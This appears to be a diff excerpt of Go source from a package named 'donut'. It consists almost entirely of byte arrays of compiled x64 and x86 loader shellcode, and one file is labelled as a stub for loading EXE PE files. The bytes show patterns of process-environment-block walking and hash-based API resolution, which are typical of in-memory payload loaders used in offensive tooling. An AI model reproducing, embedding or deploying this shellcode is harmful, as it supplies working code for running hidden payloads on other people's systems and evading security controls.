689 0x4d, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85,
690 0xa3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x30, 0x01, 0x00, 0x00, 0xc7,
691 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0xe0, 0x05,
692 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x44, 0x8b, 0xcb, 0x33, 0xd2,
693 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d, 0x8d, 0x30, 0x01, 0x00, 0x00,
694 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00,
695 0x00, 0x44, 0x8d, 0x43, 0x03, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xf8, 0x4c,
696 0x8b, 0x09, 0x41, 0xff, 0x51, 0x40, 0x48, 0x8b, 0xcf, 0x8b, 0xd8, 0xff,
697 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x75, 0x4a, 0x48, 0x83, 0x64,
698 0x24, 0x48, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00,
699 0x45, 0x33, 0xc0, 0x21, 0x5c, 0x24, 0x38, 0x49, 0x8b, 0xd6, 0x48, 0x8b,
700 0x8d, 0x70, 0x03, 0x00, 0x00, 0x21, 0x5c, 0x24, 0x30, 0x48, 0x83, 0x64,
701 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x8b, 0x01,
702 0xff, 0x50, 0x28, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b, 0x8d, 0x60, 0x03,
703 0x00, 0x00, 0x8d, 0x53, 0x02, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x28, 0x48,
704 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
705 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50,
706 0x38, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
707 0x50, 0x10, 0x44, 0x8b, 0x86, 0x18, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x49,
708 0x8b, 0xce, 0x46, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0xe8, 0x41,
709 0x08, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x49,
710 0x8b, 0xce, 0xff, 0x56, 0x50, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x04, 0x00,
711 0x00, 0x49, 0x8b, 0x5b, 0x28, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0xe3,
712 0x41, 0x5e, 0x5f, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
713 0x18, 0x48, 0x89, 0x54, 0x24, 0x10, 0x55, 0x56, 0x57, 0x41, 0x54, 0x41,
714 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00,
715 0x65, 0x48, 0x8b, 0x04, 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf1,
716 0x48, 0x81, 0xc1, 0x4c, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x68, 0x60, 0x4d,
717 0x8b, 0x65, 0x20, 0x4c, 0x89, 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff,
718 0x56, 0x40, 0x33, 0xc9, 0x4c, 0x8b, 0xd8, 0x4c, 0x63, 0x48, 0x3c, 0x4c,
719 0x03, 0xc8, 0x45, 0x0f, 0xb7, 0x51, 0x14, 0x45, 0x0f, 0xb7, 0x41, 0x06,
720 0x4d, 0x03, 0xd1, 0x45, 0x85, 0xc0, 0x74, 0x19, 0x44, 0x8b, 0x8e, 0x44,
721 0x03, 0x00, 0x00, 0x48, 0x8d, 0x04, 0x89, 0x45, 0x39, 0x4c, 0xc2, 0x18,
722 0x74, 0x73, 0xff, 0xc1, 0x41, 0x3b, 0xc8, 0x72, 0xee, 0x8b, 0x9c, 0x24,
723 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xbc, 0x24, 0xf0, 0x00, 0x00, 0x00,
724 0x33, 0xed, 0x85, 0xdb, 0x74, 0x3a, 0x4c, 0x8b, 0xf7, 0x49, 0x8b, 0x56,
725 0x08, 0x48, 0x8b, 0xce, 0xe8, 0xeb, 0xec, 0xff, 0xff, 0x85, 0xc0, 0x74,
726 0x1d, 0x41, 0xb0, 0x01, 0x49, 0x8d, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd6,
727 0xff, 0x96, 0x60, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x45, 0x4c, 0x8b,
728 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff, 0xc5, 0x49, 0x83, 0xc6, 0x08,
729 0x3b, 0xeb, 0x72, 0xc9, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0x00, 0x01,
730 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41,
731 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x8d, 0x04,
732 0x89, 0x41, 0x8b, 0x7c, 0xc2, 0x24, 0x41, 0x8b, 0x5c, 0xc2, 0x20, 0x49,
733 0x03, 0xfb, 0xc1, 0xeb, 0x03, 0xeb, 0x8d, 0x41, 0xb0, 0x01, 0x49, 0x8d,
734 0x54, 0x24, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xff, 0x96, 0x70, 0x01,
735 0x00, 0x00, 0x48, 0x8b, 0x94, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x49, 0x8b,
736 0xce, 0xff, 0x96, 0x90, 0x01, 0x00, 0x00, 0x33, 0xed, 0x4c, 0x8b, 0xff,
737 0x49, 0x8b, 0x57, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x58, 0xec, 0xff, 0xff,
738 0x85, 0xc0, 0x74, 0x15, 0x41, 0xb0, 0x01, 0x48, 0x8d, 0x4c, 0x24, 0x20,
739 0x49, 0x8b, 0xd7, 0xff, 0x96, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75,
740 0x13, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x49, 0x83, 0xc7, 0x08, 0x41,
741 0x03, 0xe9, 0x3b, 0xeb, 0x73, 0x2d, 0xeb, 0xc8, 0x41, 0xb0, 0x01, 0x48,
742 0x8d, 0x4c, 0x24, 0x20, 0x49, 0x8b, 0xd6, 0xff, 0x96, 0x70, 0x01, 0x00,
743 0x00, 0x48, 0x8d, 0x0c, 0xef, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
744 0x8d, 0x54, 0x24, 0x20, 0xe8, 0x77, 0x06, 0x00, 0x00, 0x41, 0xb9, 0x01,
745 0x00, 0x00, 0x00, 0x49, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x78, 0x10, 0xe9,
746 0xdb, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0xbe, 0x6c, 0x03, 0x00, 0x00, 0x41,
747 0x8a, 0x0f, 0x33, 0xed, 0x33, 0xd2, 0x45, 0x8b, 0xe1, 0x84, 0xc9, 0x0f,
748 0x84, 0xbf, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x80, 0xf9, 0x3b, 0x74,
749 0x2e, 0x81, 0xfa, 0x80, 0x00, 0x00, 0x00, 0x73, 0x26, 0x33, 0xc0, 0x42,
750 0x88, 0x4c, 0x04, 0x30, 0x80, 0xf9, 0x77, 0x41, 0x0f, 0x45, 0xc4, 0x80,
751 0xf9, 0x70, 0x44, 0x8b, 0xe0, 0x41, 0x0f, 0x44, 0xe9, 0x41, 0x03, 0xd1,
752 0x44, 0x8b, 0xc2, 0x42, 0x8a, 0x0c, 0x3a, 0x84, 0xc9, 0x75, 0xcd, 0x85,
753 0xd2, 0x0f, 0x84, 0x81, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0x01, 0xc6, 0x44,
754 0x14, 0x30, 0x00, 0x4c, 0x03, 0xf9, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
755 0x8b, 0x4f, 0x30, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01,
756 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x8b, 0x45, 0x85, 0xe4, 0x74,
757 0x29, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
758 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x0f, 0x84, 0x6e, 0xff, 0xff,
759 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84, 0x64, 0xff, 0xff, 0xff, 0x48,
760 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x26, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3,
761 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb,
762 0x0f, 0x84, 0x45, 0xff, 0xff, 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84,
763 0x3b, 0xff, 0xff, 0xff, 0x49, 0x8b, 0x46, 0x08, 0x48, 0x89, 0x03, 0xe9,
764 0x2f, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00,
765 0x0f, 0x85, 0x1a, 0xff, 0xff, 0xff, 0x41, 0x8b, 0xc1, 0xe9, 0x48, 0xfe,
766 0xff, 0xff, 0xcc, 0xcc, 0x41, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
767 0xc0, 0xc3, 0xcc, 0xcc, 0x2b, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc, 0xcc,
768 0x44, 0x8b, 0xc2, 0x8b, 0xc1, 0x99, 0x41, 0xf7, 0xf8, 0xc3, 0xcc, 0xcc,
769 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
770 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20, 0x65, 0x48, 0x8b, 0x04,
771 0x25, 0x30, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48,
772 0x8b, 0xe9, 0x45, 0x33, 0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41,
773 0x18, 0x48, 0x8b, 0x58, 0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20,
774 0x4c, 0x8b, 0xcf, 0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd,
775 0xe8, 0xc3, 0xe3, 0xff, 0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48,
776 0x8b, 0x43, 0x30, 0x48, 0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24,
777 0x30, 0x49, 0x8b, 0xc2, 0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74,
778 0x24, 0x40, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0x48, 0x89, 0x5c, 0x24,
779 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
780 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x30, 0x33, 0xff, 0x33, 0xed,
781 0x45, 0x33, 0xf6, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf9, 0x42, 0x8a, 0x54,
782 0x3d, 0x00, 0x84, 0xd2, 0x74, 0x11, 0x83, 0xfd, 0x40, 0x74, 0x0c, 0x8b,
783 0xc7, 0xff, 0xc7, 0xff, 0xc5, 0x88, 0x54, 0x04, 0x20, 0xeb, 0x56, 0x8b,
784 0xc7, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0x48, 0x03, 0xd8, 0x41, 0xb8, 0x10,
785 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x44, 0x2b, 0xc7, 0x33, 0xd2, 0xe8,
786 0xa4, 0x04, 0x00, 0x00, 0xc6, 0x03, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x20,
787 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x63, 0x00, 0x00,
788 0x00, 0x33, 0xd2, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0x48, 0x33, 0xf0, 0x44,
789 0x8d, 0x42, 0x10, 0xe8, 0x7c, 0x04, 0x00, 0x00, 0x8b, 0xc5, 0xbf, 0x10,
790 0x00, 0x00, 0x00, 0xc1, 0xe0, 0x03, 0x89, 0x44, 0x24, 0x2c, 0x41, 0xff,
791 0xc6, 0x83, 0xff, 0x10, 0x75, 0x12, 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c,
792 0x24, 0x20, 0xe8, 0x2d, 0x00, 0x00, 0x00, 0x48, 0x33, 0xf0, 0x33, 0xff,
793 0x45, 0x85, 0xf6, 0x0f, 0x84, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
794 0x24, 0x50, 0x48, 0x8b, 0xc6, 0x48, 0x8b, 0x74, 0x24, 0x60, 0x48, 0x8b,
795 0x6c, 0x24, 0x58, 0x48, 0x83, 0xc4, 0x30, 0x41, 0x5f, 0x41, 0x5e, 0x5f,
796 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x10,
797 0x0f, 0x10, 0x01, 0x48, 0x89, 0x50, 0x10, 0x8b, 0xca, 0x44, 0x8b, 0x40,
798 0x14, 0x45, 0x33, 0xd2, 0x0f, 0x11, 0x04, 0x24, 0x8b, 0x50, 0xf4, 0x44,
799 0x8b, 0x58, 0xf0, 0x8b, 0x58, 0xec, 0x44, 0x8b, 0x0c, 0x24, 0x8b, 0xc2,
800 0xc1, 0xc9, 0x08, 0x41, 0x03, 0xc8, 0x8b, 0xd3, 0x41, 0x33, 0xc9, 0xc1,
801 0xca, 0x08, 0x41, 0x03, 0xd1, 0x41, 0xc1, 0xc0, 0x03, 0x41, 0x33, 0xd2,
802 0x41, 0xc1, 0xc1, 0x03, 0x44, 0x33, 0xca, 0x44, 0x33, 0xc1, 0x41, 0xff,
803 0xc2, 0x41, 0x8b, 0xdb, 0x44, 0x8b, 0xd8, 0x41, 0x83, 0xfa, 0x1b, 0x72,
804 0xcd, 0x89, 0x4c, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24, 0x2c, 0x48, 0x8b,
805 0x44, 0x24, 0x28, 0x48, 0x83, 0xc4, 0x10, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
806 0x45, 0x85, 0xc9, 0x0f, 0x84, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c,
807 0x24, 0x08, 0x48, 0x89, 0x7c, 0x24, 0x10, 0x4c, 0x89, 0x74, 0x24, 0x18,
808 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x10, 0x4c, 0x8b, 0xd1, 0x48,
809 0x8d, 0x45, 0xf0, 0x4c, 0x2b, 0xd0, 0x4d, 0x8b, 0xd8, 0x48, 0x8b, 0xfa,
810 0x41, 0xbe, 0x10, 0x00, 0x00, 0x00, 0x0f, 0x10, 0x07, 0x48, 0x8d, 0x4d,
811 0xf0, 0xba, 0x04, 0x00, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0xf0, 0x41,
812 0x8b, 0x04, 0x0a, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48, 0x83, 0xea,
813 0x01, 0x75, 0xf0, 0x8b, 0x55, 0xfc, 0x49, 0x8b, 0xde, 0x8b, 0x45, 0xf8,
814 0x44, 0x8b, 0x45, 0xf4, 0x8b, 0x4d, 0xf0, 0x41, 0x03, 0xc8, 0x03, 0xc2,
815 0x41, 0xc1, 0xc0, 0x05, 0x44, 0x33, 0xc1, 0xc1, 0xc2, 0x08, 0x33, 0xd0,
816 0xc1, 0xc1, 0x10, 0x41, 0x03, 0xc0, 0x03, 0xca, 0x41, 0xc1, 0xc0, 0x07,
817 0xc1, 0xc2, 0x0d, 0x44, 0x33, 0xc0, 0x33, 0xd1, 0xc1, 0xc0, 0x10, 0x48,
818 0x83, 0xeb, 0x01, 0x75, 0xd2, 0x89, 0x55, 0xfc, 0x8d, 0x53, 0x04, 0x89,
819 0x4d, 0xf0, 0x48, 0x8d, 0x4d, 0xf0, 0x44, 0x89, 0x45, 0xf4, 0x89, 0x45,
820 0xf8, 0x42, 0x8b, 0x04, 0x11, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48,
821 0x83, 0xea, 0x01, 0x75, 0xf0, 0x45, 0x3b, 0xce, 0x41, 0x8b, 0xc9, 0x41,
822 0x0f, 0x47, 0xce, 0x85, 0xc9, 0x74, 0x1b, 0x4c, 0x8d, 0x45, 0xf0, 0x8b,
823 0xd9, 0x4d, 0x2b, 0xc3, 0x49, 0x8b, 0xd3, 0x41, 0x8a, 0x04, 0x10, 0x30,
824 0x02, 0x48, 0xff, 0xc2, 0x48, 0x83, 0xeb, 0x01, 0x75, 0xf1, 0x44, 0x2b,
825 0xc9, 0x8b, 0xc1, 0x4c, 0x03, 0xd8, 0x41, 0x8b, 0xd6, 0x8d, 0x42, 0xff,
826 0x80, 0x04, 0x38, 0x01, 0x75, 0x06, 0xff, 0xca, 0x85, 0xd2, 0x7f, 0xf1,
827 0x45, 0x85, 0xc9, 0x0f, 0x85, 0x31, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
828 0x24, 0x20, 0x48, 0x8b, 0x7c, 0x24, 0x28, 0x4c, 0x8b, 0x74, 0x24, 0x30,
829 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
830 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
831 0x89, 0x70, 0x20, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x40, 0x8a,
832 0x01, 0x41, 0x83, 0xce, 0xff, 0x83, 0x65, 0xf4, 0x00, 0x45, 0x33, 0xc9,
833 0x88, 0x02, 0x33, 0xff, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x8b, 0xda, 0x48,
834 0x89, 0x45, 0xe8, 0x45, 0x8b, 0xde, 0x48, 0x8d, 0x41, 0x01, 0x48, 0x89,
835 0x45, 0xe0, 0x8d, 0x77, 0x01, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xf6, 0x01,
836 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00, 0x48, 0x8d,
837 0x4d, 0xe0, 0xe8, 0xe5, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x9f,
838 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xd4, 0x01, 0x00, 0x00,
839 0x85, 0xc0, 0x74, 0x4e, 0x45, 0x33, 0xc9, 0x45, 0x8d, 0x51, 0x04, 0x48,
840 0x8d, 0x4d, 0xe0, 0xe8, 0xc0, 0x01, 0x00, 0x00, 0x46, 0x8d, 0x0c, 0x48,
841 0x44, 0x2b, 0xd6, 0x75, 0xee, 0x45, 0x85, 0xc9, 0x74, 0x1d, 0x48, 0x8b,
842 0x55, 0xe8, 0x48, 0x8b, 0xc2, 0x41, 0x8b, 0xc9, 0x48, 0x2b, 0xc1, 0x8a,
843 0x00, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0x6b,
844 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0xc6, 0x00, 0x00, 0x48, 0x03,
845 0xc6, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8b,
846 0x45, 0xe0, 0x44, 0x0f, 0xb6, 0x18, 0x48, 0x03, 0xc6, 0x41, 0x8b, 0xcb,
847 0x48, 0x89, 0x45, 0xe0, 0x23, 0xce, 0x83, 0xc1, 0x02, 0x41, 0xd1, 0xeb,
848 0x74, 0x21, 0x48, 0x8b, 0x55, 0xe8, 0x45, 0x8b, 0xc3, 0x49, 0xf7, 0xd8,
849 0x41, 0x8a, 0x04, 0x10, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x41, 0x03, 0xce,
850 0x75, 0xf2, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b,
851 0xfe, 0xe9, 0xf5, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xd6, 0x48, 0x8d, 0x4d,
852 0xe0, 0xe8, 0x32, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d,
853 0x14, 0x50, 0xe8, 0x25, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x45,
854 0x85, 0xc9, 0x75, 0x48, 0x41, 0x83, 0xfa, 0x02, 0x75, 0x42, 0x44, 0x8b,
855 0xce, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0x0a, 0x01, 0x00, 0x00, 0x48, 0x8d,
856 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8, 0xfd, 0x00, 0x00, 0x00, 0x85,
857 0xc0, 0x75, 0xe6, 0x45, 0x85, 0xc9, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00,
858 0x48, 0x8b, 0x4d, 0xe8, 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04,
859 0x0a, 0x88, 0x01, 0x48, 0x03, 0xce, 0x45, 0x03, 0xce, 0x75, 0xf3, 0xe9,
860 0x87, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x44, 0x33, 0xce, 0x45,
861 0x2b, 0xd1, 0x44, 0x8b, 0xce, 0x41, 0xc1, 0xe2, 0x08, 0x44, 0x0f, 0xb6,
862 0x19, 0x41, 0x81, 0xc3, 0x00, 0xfe, 0xff, 0xff, 0x45, 0x03, 0xda, 0x48,
863 0x03, 0xce, 0x48, 0x89, 0x4d, 0xe0, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xa5,
864 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8,
865 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x41, 0x81, 0xfb, 0x00,
866 0x7d, 0x00, 0x00, 0x41, 0x8d, 0x41, 0x01, 0x41, 0x0f, 0x42, 0xc1, 0x41,
867 0x81, 0xfb, 0x00, 0x05, 0x00, 0x00, 0x8d, 0x48, 0x01, 0x0f, 0x42, 0xc8,
868 0x41, 0x81, 0xfb, 0x80, 0x00, 0x00, 0x00, 0x44, 0x8d, 0x41, 0x02, 0x44,
869 0x0f, 0x43, 0xc1, 0x45, 0x85, 0xc0, 0x74, 0x1b, 0x48, 0x8b, 0x4d, 0xe8,
870 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04, 0x0a, 0x88, 0x01, 0x48,
871 0x03, 0xce, 0x45, 0x03, 0xc6, 0x75, 0xf3, 0x48, 0x89, 0x4d, 0xe8, 0x44,
872 0x8b, 0xce, 0xeb, 0x1d, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x4d, 0xe8,
873 0x8a, 0x02, 0x88, 0x01, 0x48, 0x03, 0xce, 0x48, 0x03, 0xd6, 0x48, 0x89,
874 0x4d, 0xe8, 0x48, 0x89, 0x55, 0xe0, 0x45, 0x33, 0xc9, 0x85, 0xff, 0x0f,
875 0x84, 0x20, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x74, 0x24,
876 0x58, 0x2b, 0xc3, 0x48, 0x8b, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24,
877 0x60, 0x4c, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3,
878 0x8b, 0x51, 0x14, 0x4c, 0x8b, 0xc1, 0x8d, 0x42, 0xff, 0x89, 0x41, 0x14,
879 0x85, 0xd2, 0x75, 0x17, 0x48, 0x8b, 0x01, 0x0f, 0xb6, 0x10, 0x48, 0xff,
880 0xc0, 0x48, 0x89, 0x01, 0x8b, 0xc2, 0xc7, 0x41, 0x14, 0x07, 0x00, 0x00,
881 0x00, 0xeb, 0x03, 0x8b, 0x41, 0x10, 0x8d, 0x0c, 0x00, 0xc1, 0xe8, 0x07,
882 0x83, 0xe0, 0x01, 0x41, 0x89, 0x48, 0x10, 0xc3, 0x4c, 0x8b, 0xc9, 0x45,
883 0x85, 0xc0, 0x74, 0x13, 0x48, 0x2b, 0xd1, 0x42, 0x8a, 0x04, 0x0a, 0x41,
884 0x88, 0x01, 0x49, 0xff, 0xc1, 0x41, 0x83, 0xc0, 0xff, 0x75, 0xf0, 0x48,
885 0x8b, 0xc1, 0xc3, 0xcc, 0x48, 0x89, 0x7c, 0x24, 0x08, 0x4c, 0x8b, 0xc9,
886 0x8a, 0xc2, 0x49, 0x8b, 0xf9, 0x41, 0x8b, 0xc8, 0xf3, 0xaa, 0x48, 0x8b,
887 0x7c, 0x24, 0x08, 0x49, 0x8b, 0xc1, 0xc3, 0xcc, 0xeb, 0x0f, 0x80, 0x3a,
888 0x00, 0x74, 0x10, 0x3a, 0x02, 0x75, 0x0c, 0x48, 0xff, 0xc1, 0x48, 0xff,
889 0xc2, 0x8a, 0x01, 0x84, 0xc0, 0x75, 0xeb, 0x0f, 0xbe, 0x01, 0x0f, 0xbe,
890 0x0a, 0x2b, 0xc1, 0xc3};
891
+811
-0
loader_exe_x86.go less more
0 package donut
1
2 // LOADER_EXE_X86 - stub for EXE PE files
3 var LOADER_EXE_X86 = []byte{
4
5 0x81, 0xec, 0xcc, 0x02, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
6 0xdc, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x8b, 0x86, 0x38,
7 0x02, 0x00, 0x00, 0x0b, 0x86, 0x3c, 0x02, 0x00, 0x00, 0x0f, 0x84, 0xd4,
8 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c,
9 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x00, 0x00, 0x00, 0x56, 0xe8, 0xb8,
10 0x20, 0x00, 0x00, 0x8b, 0xf8, 0x83, 0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84,
11 0xaa, 0x00, 0x00, 0x00, 0x53, 0x53, 0x56, 0xe8, 0x99, 0x20, 0x00, 0x00,
12 0x8b, 0xc8, 0xb8, 0x12, 0x21, 0x40, 0x00, 0x2d, 0xed, 0x30, 0x40, 0x00,
13 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff, 0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8,
14 0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x01, 0x00, 0x00, 0xff, 0xb6, 0xa8,
15 0x01, 0x00, 0x00, 0x56, 0xe8, 0x76, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c,
16 0x8b, 0xe8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x94, 0x00, 0x00, 0x00, 0xff,
17 0xb6, 0x90, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x5c, 0x20, 0x00, 0x00, 0xff,
18 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x9c, 0x00, 0x00,
19 0x00, 0xff, 0xb6, 0x98, 0x00, 0x00, 0x00, 0x56, 0xe8, 0x42, 0x20, 0x00,
20 0x00, 0x83, 0xc4, 0x3c, 0x85, 0xed, 0x74, 0x46, 0x85, 0xdb, 0x74, 0x42,
21 0x85, 0xc0, 0x74, 0x3e, 0x8d, 0x4c, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x10,
22 0x07, 0x00, 0x01, 0x00, 0x51, 0xff, 0xd0, 0x50, 0xff, 0xd3, 0x8b, 0x86,
23 0x38, 0x02, 0x00, 0x00, 0x83, 0xa4, 0x24, 0xd4, 0x00, 0x00, 0x00, 0xfc,
24 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x10, 0x6a,
25 0x00, 0x50, 0xff, 0xd5, 0xeb, 0x0c, 0x83, 0xc8, 0xff, 0xeb, 0x09, 0x56,
26 0xe8, 0x11, 0x10, 0x00, 0x00, 0x59, 0x8b, 0xc7, 0x5f, 0x5e, 0x5d, 0x5b,
27 0x81, 0xc4, 0xcc, 0x02, 0x00, 0x00, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x83,
